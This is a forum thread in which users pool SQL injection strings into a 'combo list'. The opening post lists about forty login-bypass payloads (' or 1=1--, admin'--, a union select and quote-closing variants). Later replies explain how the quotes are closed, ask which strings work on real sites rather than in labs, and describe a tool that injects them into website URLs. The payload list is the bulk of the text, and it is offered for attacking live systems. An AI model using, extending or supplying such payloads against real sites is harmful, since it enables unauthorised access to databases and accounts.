10 replies to this topic

[Eyeless]

OK well im really starting to dabble in SQL jection', and I need more strings, im trying to make a sort of combo list... If you all post what you got ill make one big list and post it on the board. If you dont know what your doing dont post.... Or alternativly post meathods used to find new strings...

List so far:

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

[Blake]

Have you seen the list Comsec compiled in his SQL injection tutorial?

[Logan]

i think gsecur was referring to this
http://www.governmen...&st=0

[Eyeless]

I have but as the description shows "I WANT MORE!" I know there are more as he says "the list below is a sample of the most common used" the above list was made from various tuts... along with new combos of old strings re-ordered..
also I noticed you add ' hi" or 1=1 -- ' would changeing the word have any effect? Maybe trying common usernames?

[Logan]

it's sql... usually if you want to use a vulnerability (open source), you have to learn the language
SQL is simple, learn how exactly it gets read and other possibilities of doing it... then you could make your own!

example
" or "a"="a
') or ('a'='a

on some databases one would work, other wouldn't.. first one would enclose the username (or pass) in quotes... first it would CLOSE the quotes (making it "") and then says.. or "a"="a.. the last quote would be closeing the final a.. and "a"="a" is always true, so that would be how it works
however, the second uses ('Username').. and changing it to say "('') or ('a'='a')"

so to answer your question, YES another word can be put in....

[Eyeless]

I c I c, sql will be learned, however I probly aint going to get to far into it so agian if you have any diffrent strings please post!

[Eyeless]

No ones postin',wait,oooo,damn nope,*pissed*

[MonikaLec]

Hello,
below I am giving you the link to the teaser of a new Hakin9 Magazin in which the main topic is SQL Injection. To download it you have to register on the free account.
Here is the link: http://hakin9.org/wp...load.php?id=221 I hope it is helpful

[TerminalX]

Well i appreciate your effort regarding this but have you tried these strings your self to know which of them work and which of them don't? personally iam graping the strings that i assure to work in real world enviroment , not in LAB etc. can you please tell me which ones you tried and they worked?

[acu281]

Well i appreciate your effort regarding this but have you tried these strings your self to know which of them work and which of them don't? personally iam graping the strings that i assure to work in real world enviroment , not in LAB etc. can you please tell me which ones you tried and they worked?

tnx 4 guide

no, i dont try all of them,

because i don't wanna hack a website or fetch informations and like this

actually i work on first step of SQL Injection hacking, and need to test website to understand that website is Vulnerable or no

i clollected my string from a forum and my software gives that string and inject them to website URL after '?'

plz Help! 

tnx

[acu281]

LOOOOOOOOOOOOOOL wrong post )))

but not matter,

like Eyeless i'm working on sql injection and i think we hase same problem